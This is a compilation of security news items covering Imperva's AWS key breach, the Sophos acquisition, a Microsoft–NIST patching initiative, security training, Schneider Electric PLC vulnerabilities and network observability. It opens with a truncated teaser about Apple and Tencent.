Do you know Apple is sending iOS web browsing related data of some of its users to Chinese Internet company Tencent? I am sure many of you are not aware of this, neither was I, and believe me, none of us could expect this from a tech company that promotes itself as a champion of consumer privacy. Late last week, it was widely revealed that starting from at least iOS 12.2, Apple silently

Imperva explains how hackers stole AWS API Key and accessed to customer data

Imperva shared details on the incident it has recently suffered and how hackers obtain data on Cloud Web Application Firewall (WAF) customers.

In August, cybersecurity firm Imperva disclosed a data breach that exposed sensitive information for some customers of its Cloud Web Application Firewall (WAF) product, formerly known as Incapsula.

Incapsula, is a CDN service designed to protect customers’ website from all threats and mitigate DDoS attacks.

Imperva CEO Chris Hylen revealed that the company learned about the incident on August 20, 2019, when it was informed about the data exposure impacting Cloud Web Application Firewall (WAF) product.

“We want to be very clear that this data exposure is limited to our Cloud WAF product.” reads the Hylen’s announcement. “Here is what we know about the situation today:

  • On August 20, 2019, we learned from a third party of a data exposure that impacts a subset of customers of our Cloud WAF product who had accounts through September 15, 2017.
  • Elements of our Incapsula customer database through September 15, 2017 were exposed. These included:
    • email addresses
    • hashed and salted passwords

Laked data included email addresses and hashed and salted passwords for all Cloud WAF customers who registered before 15th September 2017.

Hylen added that for a subset of the Incapsula customers, through September 15, 2017, were exposed API keys and customer-provided SSL certificates.

In a blog post published by Imperva, the company confirmed that it was informed of the incident by someone who had requested a bug bounty. The firm explained that the data was exfiltrated without exploiting any vulnerability in its systems.

The analysis of the data confirmed that attackers stole data in October.

“Our investigation identified an unauthorized use of an administrative API key in one of our production AWS accounts in October 2018, which led to an exposure of a database snapshot containing emails and hashed & salted passwords.” reads the post published by Imperva.

“We compared the SQL dump in the provided dataset to our snapshots and found a match. As of this post, we can say that the elements of customer data defined above were limited to Cloud WAF accounts prior and up to September 15, 2017. Databases and snapshots for our other product offerings were not exfiltrated,”

The company announced to have adopted additional security measures to protect its customers, including the creation of new instances behind its VPN by default, the implementation of monitoring and patching programs, decommission unused and non-critical compute instances.

Imperva explained that the incident was related to the process migration of its infrastructure to AWS cloud technologies that begun back in 2017.

At the time, the development team created a database snapshot for testing and to evaluate the migration to AWS. An internal compute instance that they created was exposed online and it contained an AWS API key. This instance was compromised and hackers exfiltrated the AWS API key and used it to access the snapshot.

In response to the incident, Imperva changed 13,000 passwords, more than 13,500 SSL certificates have been rotated and regenerated roughly 1,400 API keys. The good news is that the company is not aware of malicious account activity associated with the hack.

While the company is still investigating the incident it recommends the following security measures to its customers:

Pierluigi Paganini

(SecurityAffairs – Imperva, hacking)

The post Imperva explains how hackers stole AWS API Key and accessed to customer data appeared first on Security Affairs.

Thoma Bravo to acquire Sophos for $3.9 billion

Sophos announced that Thoma Bravo, a US-based private equity firm, has made an offer to acquire Sophos for $7.40 USD per share, representing an enterprise value of approximately $3.9 billion. The board of directors of Sophos have stated their intention to unanimously recommend the offer to the company’s shareholders. Thoma Bravo is a leading private equity firm focused on the software and technology enabled services sector with more than $35 billion in investor commitments. With … More

The post Thoma Bravo to acquire Sophos for $3.9 billion appeared first on Help Net Security.

Microsoft and NIST Team Up on Patching Guide

Microsoft and NIST Team Up on Patching Guide

Microsoft has teamed up with the US National Institute of Standards and Technology (NIST) to develop a new guide designed to make enterprise patch management easier.

Microsoft lead cybersecurity architect, Mark Simon, explained that the firm had first worked closely with partners from the Center for Internet Security, Department of Homeland Security (DHS) and the DHS’s Cybersecurity and Infrastructure Security Agency (CISA), as well as visiting several customers.

Two common challenges emerging from discussions with the latter revolved around testing of patches and confusion over how quickly they should be implemented.

“This articulated need for good reference processes was further validated by observing that a common practice for ‘testing’ a patch before a deployment often consisted solely of asking whether anyone else had any issues with the patch in an online forum,” Simon explained.

“This realization guided the discussions with our partners towards creating an initiative in the NIST NCCoE [National Cybersecurity Center of Excellence] in collaboration with other industry vendors. This project — kicking off soon — will build common enterprise patch management reference architectures and processes, have relevant vendors build and validate implementation instructions in the NCCoE lab, and share the results in the NIST Special Publication 1800 practice guide for all to benefit.”

Microsoft has extended an open invitation to join the effort to any vendors which have technology that could streamline the patching process, and organizations or individuals who may have wisdom to share — either best practice tips or lessons learned.

Fixing software vulnerabilities has never been more important, especially as society increasingly relies on modern IT systems. The growth of digital transformation projects will only further amplify their importance, argued Simon.

“Applying patches is a critical part of protecting your system, and we learned that while it isn’t as easy as security departments think, it isn’t as hard as IT organizations think,” he concluded.

3 reasons cyber security training is essential

Organisations are always looking for ways to improve their cyber security defences, but they often overlook the value of enrolling their employees on cyber security training courses.

According to a study by Centify, 77% of UK workers say they have never received any form of cyber skills training Given that, it’s no surprise that so many people exercise such poor security practices.

For example, the survey also revealed that 27% of employees use the same passwords for multiple accounts and 14% leave their credentials written down in a notebook or on their desk.

It’s easy to scoff at people for making basic mistakes, but if employers don’t teach them otherwise, they’re inviting trouble.

With October being European Cyber Security Awareness Month, what better time is there to boost your organisation’s knowledge of effective information security practices?

Here are three reasons to consider it:

1. You’ll reduce the risk of data breaches

If you want to keep your organisation secure, you need your employees to know what they’re doing. Almost all data breaches are caused by a mistake somewhere in the organisation.

That doesn’t only mean negligence – it could also be mistakes that you don’t even know are mistakes, such as gaps in your policies, ineffective processes or a lack of proper technological defences.

Placing staff on information security training courses will help them understand the mistakes they’re making and teach them to work more effectively.

This is especially useful if you intend to commit to a framework such as ISO 27001, the international standard for information security, as there are specific courses that teach you how to follow the Standard’s requirements.

2. You’ll meet compliance requirements

Cyber security laws and regulations inevitably contain complex requirements, so organisations need employees with specialist knowledge to achieve compliance.

For example, organisations that are required to appoint a DPO (data protection officer) under the EU GDPR (General Data Protection Regulation) must find someone with an in-depth understanding of data protection law.

The stakes associated with the position are huge; if the DPO doesn’t perform their tasks in accordance with the GDPR’s requirements, the organisation is liable to face regulatory action.

It’s therefore paramount that the DPO is given every resource available to do their job properly, and training courses should always be sought where possible.

They are not only the quickest way of studying but also usually include exams, which reassures employers that the individual is qualified.

The same advice applies for individuals in roles that involve compliance with the NIS Regulations (Network and Information Systems Regulations 2018), the PCI DSS (Payment Card Industry Data Security Standard), ISO 27001 or any other law or framework.

3. You’ll foster career growth

Training courses enable employees to pick up new skills and gain more advanced qualifications, which will help them move into more senior roles. This isn’t only beneficial for them but also their employers. It’s getting increasingly hard to find qualified information security professionals, with one report estimating that there will be 3.5 million unfilled jobs in the industry by 2021.

Finding qualified personnel isn’t the only problem. A small pool of skilled workers also means job candidates can command a higher salary and more benefits. As such, organisations might not be able to afford qualified professionals even if they can find them.

They should therefore do whatever they can to support employees who want to go on training courses. Organisations will almost certainly benefit from the extra knowledge, and it eases the pressure of finding skilled personnel in the job market.

Which course is right for you?

Cyber security is a broad industry, so you need to decide which area suits you best. To help you make that choice, here are some of our most popular training courses:

Knowledge of ISO 27001, the international standard for information security, is an absolute must for anyone who handles sensitive data. We offer several ISO 27001 courses, including an introduction to the Standard and guidance on specific roles, such as internal auditor and lead implementer.

ISO 22301 is the international standard for business continuity. Organisations that follow its framework can be sure that they’ll continue operating when disaster strikes.

Our Foundation-level course covers the essentials of the Standard, but we also offer advanced courses for those that want to lead an implementation project or audit.

Any organisation that transmits, processes or stores payment card data must comply with the PCI DSS. Our training courses help you understand the basics of the Standard, implement its requirements and complete the SAQ (self-assessment questionnaire).

The GDPR is the most significant update to information security law in more than twenty years. Anyone who handles personal data or is responsible for data protection needs to comply with its requirements.

Regular staff should familiarise themselves with the Regulation via our Foundation-level course, senior staff would benefit from our Practitioner course and those looking to fulfil the DPO role should enrol on our Certified DPO training course.


A version of this blog was originally published on 31 October 2018.

The post 3 reasons cyber security training is essential appeared first on IT Governance Blog.

Talos experts found 11 flaws in Schneider Electric Modicon Controllers

Cisco Talos experts discovered nearly a dozen flaws affecting some of the models of Schneider Electric’s Modicon programmable logic controllers.

Talos experts discovered 11 security flaws affecting some models of Schneider Electric’s Modicon programmable logic controllers.

Affected models are Modicon M580, M340, BMENOC 0311, BMENOC 0321, Quantum, Premium, and Modicon BMxCRA and 140CRA.

The unique model that is affected by all the vulnerabilities is the M580 PLC. The flaws affect the implementation of the ModbusFTP and TFTP protocols, and the REST API. Schneider Electric published four advisories to address the vulnerabilities.

The vulnerabilities in the TFTP and the REST API were tracked with codes between CVE-2019-6841 and CVE-2019-6851, an attacker could exploit them by sending specially crafted requests to the impacted devices.

The vulnerability in the TFTP protocol, tracked as CVE-2019-6851, is a File and Directory Information Exposure issue that could cause the disclosure of information from the controller when using this protocol.

REST API is affected by three vulnerabilities, CVE-2019-6848, CVE-2019-6849, CVE-2019-6850.

CVE-2019-6848 is an uncaught exception issue that could be exploited to cause a Denial of Service condition by sending specific data on the REST API of the controller/communication module.

CVE-2019-6849 is an Information Exposure vulnerability that could cause the disclosure of sensitive information when using specific Modbus services provided by the REST API of the controller/communication module.

CVE-2019-6850 is another Information Exposure vulnerability that could cause the disclosure of sensitive information when reading specific registers with the REST API of the controller/communication module.

Most of the vulnerabilities in the FTP protocol (CVE-2019-6841, CVE-2019-6842, CVE-2019-6843, CVE-2019-6844, CVE-2019-6846, CVE-2019-6847) could be exploited to cause a DoS condition.

Talos researchers reported the vulnerabilities to Schneider Electric in May and July. The company’s advisories provide a series of recommendations for preventing the exploitation of the issues. Talos blog post also includes SNORT rules to detect exploitation attempts.

Pierluigi Paganini

(SecurityAffairs – Schneider Electric Modicon, hacking)

The post Talos experts found 11 flaws in Schneider Electric Modicon Controllers appeared first on Security Affairs.

Network Security Observability & Visibility: Why they are not the same

Guest article by Sean Everson, Chief Technology Officer at Certes Networks

In today’s increasingly complex cyber landscape, it is now more important than ever for organisations to be able to analyse contextual data in order to make informed decisions regarding their network security policy. This is not possible without network observability. Organisations can now see inside the whole network architecture to explore problems as they happen. Observability is a property of the network system and should not be confused with visibility which provides limited metrics for troubleshooting.

With observability, organisations can make the whole state of the network observable and those limitations no longer exist. Observability provides the contextual data operators need to analyse and gain new and deeper insights into the network. This enables teams to proactively make more informed decisions to improve network performance and to strengthen their overall security posture because context is now available to troubleshoot incidents and make policy changes in real-time.

Unfortunately, observability is often miscommunicated and misunderstood, as visibility is repackaged by some vendors and sold as observability, when the two are not the same. Visibility and monitoring have an important role to play but observability is different. Visibility and the metrics it provides limits troubleshooting, whereas observability provides rich contextual data to gain deeper insights and understanding based on the raw data collected from the network or system.

With research showing that the average lifecycle of a data breach is 279 days, it is clear that organisations are slowly putting observability into practice and adopting ‘observability as a culture’. In the case of some well-known breaches, however, the timescales were much longer than that. The Marriott International breach, which was discovered in November 2018, saw hackers freely access the network since 2014. During this time, no unusual activity was detected and no alerts of the hacker’s access were raised.

Additionally, in the British Airways data breach in 2018, data was compromised over a two-week period, affecting 500,000 customers. This resulted in the Information Commissioner's Office (ICO) announcing that it intended to fine British Airways £183.39M for infringements of the General Data Protection Regulation (GDPR).

These two examples alone demonstrate how essential it is for organisations to begin to value the ability to understand their systems and behaviour by making their network observable.

Understanding Observability
Simply defined, observability is a measure of how well something is working internally, concluded from what occurs externally. Observability is creating applications with the idea that someone is going to observe them with the aim of strengthening and making system access decisions. The right combination of contextual data can be used to gain a deeper understanding of network policy deployment and every application that tries to communicate across the network. With an observability capability, attackers will therefore have a hard time attempting to make lateral ‘east-west’ movements or remaining hidden in the data centre or across the WAN. In turn, observability can provide a global view of the network environment and visual proof that the security strategy is effective and working.

Unfortunately, it’s not uncommon for infiltrations to go undetected in networks for days, weeks or months. This means infiltrations are going undetected for longer and networks systems are more increasingly vulnerable. To effectively do this, all roles need to see inside the entire architecture. And, when this capability is built in, it is observability that enables greater insight into the overall reliability, impact and success of systems, their workload and their behaviour.

Conclusion
Research shows that companies who are able to detect and contain a breach in less than 200 days spend £1 million less on the total cost of a breach. That’s a figure no organisation can - or should - ignore. Organisations need a cyber security solution that can be measured and traced. Observability provides the contextual data so organisations can take measurable steps towards controlling system access of the network environment. With this type of observable analysis, organisations can gain deeper insights into how to enhance their security policy and detect unwanted access as it occurs.



Sean Everson, Certes Networks CTO